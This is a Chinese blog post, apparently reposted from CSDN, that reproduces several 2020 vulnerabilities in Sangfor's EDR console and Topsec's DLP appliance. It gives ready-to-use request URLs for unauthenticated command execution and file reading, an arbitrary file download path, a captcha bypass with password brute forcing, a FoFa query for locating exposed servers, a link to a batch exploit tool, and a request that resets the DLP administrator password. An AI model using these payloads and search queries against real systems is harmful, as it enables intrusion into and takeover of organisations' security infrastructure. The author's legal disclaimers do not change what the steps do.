深信服EDR

【漏洞日记】深信服EDR 吾还没见过,就听说被人日穿了

 

原创:Agan ' 

原文链接:https://blog.csdn.net/God_XiangYu/article/details/108068029


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

0x01 深信服EDR 长啥样?

0x02 深信服EDR RCE

0x03 漏洞简单简单利用方法

  任意执行命令

  Linux 读取文件内容命令

  任意文件下载漏洞复现

  验证码绕过

  友情提示:不是自己公司的服务器不要去试,你任何的动作,别人都知晓,人外有人,天外有天,且行且珍惜... ...

0x04 FoFa 搜索相关漏洞服务器

0x05 批量利用方法

分析漏洞原文章

0x06 天融信DLP 最新版本V3.1130.308ps3_DLP.1 未授权访问导致越权修改管理员密码



本来忙的都没时间看文章,没时间干其它的事,但还是想写一波复现文章,主要还是深信服的终端复现,谁让... ..

还迷迷糊糊的就听到爆了好多0day,感觉不简单,别问我,我也不清楚,也不敢多少什么,牵制到太多.. .. ,参考了公众号和一些师傅们的思路和复现文章,自己再复现一下看看,请勿用作犯罪使用,网络不是法外之地,请珍惜生命,勿触犯法律... ...

本次爆0day 列表:

1. 天擎EDR

2. 深信服VPN

3. 深信服EDR

4. 天融信DLP

其中最惨的当属深信服(每年都躺枪,都哭了)


0x01 深信服EDR 长啥样?

0x02 深信服EDR RCE

地点:https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=whoami

  这样?执行了... ...,不清楚是不是后门... ..,咋不敢乱猜测,别看... ...CSDN可能也有用。牛逼

0x03 漏洞简单简单利用方法

任意执行命令

深入一点点:https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=pwd

查看当前路径

  再看看当前路径下有哪些文件

Linux 读取文件内容命令

more和less一般用于显示文件内容超过一屏的内容,并且提供翻页的功能。

more比cat强大,提供分页显示的功能,less比more更强大,提供翻页,跳转,查找等命令。

而且more和less都支持:用空格显示下一页,按键b显示上一页。下面详细介绍这3个命令。

1)cat 后面跟要查看的文件,文件内容全部输出到屏幕,

2)more 文件内容或输出查看工具;

more 是我们最常用的工具之一,最常用的就是显示输出的内容,然后根据窗口的大小进行分页显示,然后还能提示文件的百分比;

3)less 查看文件内容

用cat 命令查看,哦吼不行,用less 也还是不想,哦吼用more OJBK,可以了

https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=more%20/XXXXX/l.php

任意文件下载漏洞复现

下载一个存在的文件,你懂我的意思吧?可以下载任意文件,不限制目录哦

https://xxx.xxx.xxx:9443/tool/log/a

验证码绕过

部分代码如下:

// 校验验证码

if (!ldb_run_at_console()) {

    if (isset($_REQUEST["captcha"])

        || $_REQUEST["captcha"] != base64_decode("M...

        echo "<font color='red'><b>验证码不对,请输入..."

        return;

    }

}

先输入几次错误密码,把验证码弄出来后,开启Burp(抓包工具)爆破密码即可,只要验证码第一次输入对后不为空,即可绕过

  如何去找有漏洞的呢?别说是我告诉你们的哦,其中一种方法就是如下,我反正不敢日,请勿尝试,非法攻击是犯法的,如上写的利用方式比较细致,请误拿去触犯法律,如果发生任何结果,都于作者无关


友情提示:不是自己公司的服务器不要去试,你任何的动作,别人都知晓,人外有人,天外有天,且行且珍惜... ...


0x04 FoFa 搜索相关漏洞服务器

Fofa:

          title="终端检测响应平台" && country="CN"


0x05 批量利用方法

网上已经放出批量利用方法了

如下:https://github.com/A2gel/sangfor-edr-exploit

分析漏洞原文章

漏洞通告:深信服edr控制端存在大量RCE漏洞,建议下线处理


0x06 天融信DLP 最新版本V3.1130.308ps3_DLP.1 未授权访问导致越权修改管理员密码

网上就只有一张截图,推测是调用了mod_pwd 修改密码模块时,没有进行校验原密码+该api接口未授权访问,组合利用,导致管理员密码可被越权修改

POST /?module=auth_user&action=mod_edit_pwd HTTP/1.1

Host:xxxx

剩下的一些参数省略.... ...

uid=1&pd=Tftp@dlp108&mod_pwd=1&dlp_perm=1

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,294评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,493评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,790评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,595评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,718评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,906评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,053评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,797评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,250评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,570评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,711评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,388评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,018评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,796评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,023评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,461评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,595评论 2 350

推荐阅读更多精彩内容

  • ​昨晚通宵,刚刚睡醒发现群里面炸锅了-EDR终端检测平台RCE 自己也来看看。 简介: EDR简介(来自官方): ...
    thelostworldSec阅读 1,679评论 0 0
  • 今天引导我和妈妈学习的阿姨来聊天,我说出觉醒之前是必须经历的剧本,觉醒之后你可以书写自己的人生。最近一直在给自己攒...
    S爱笑的眼睛阅读 50评论 0 1
  • 人类社会的规模不断扩展到全球的范围,其主要内因是利益驱动;但相伴而生的风险,却被人们有意无意地忽视。病毒流行和物种...
    德必有邻阅读 50评论 0 0
  • 自从Google在2006年公开提出云计算的概念以来,已经过了13年的时间。随着业务上云的热潮席卷全球,越来越多的...
    波_425b阅读 1,697评论 0 1
  • WebShell简介 1、WebShell分类 • JSP类型 • ASP类型 • PHP类型 2、WebShel...
    Mr_RyanXu阅读 653评论 0 1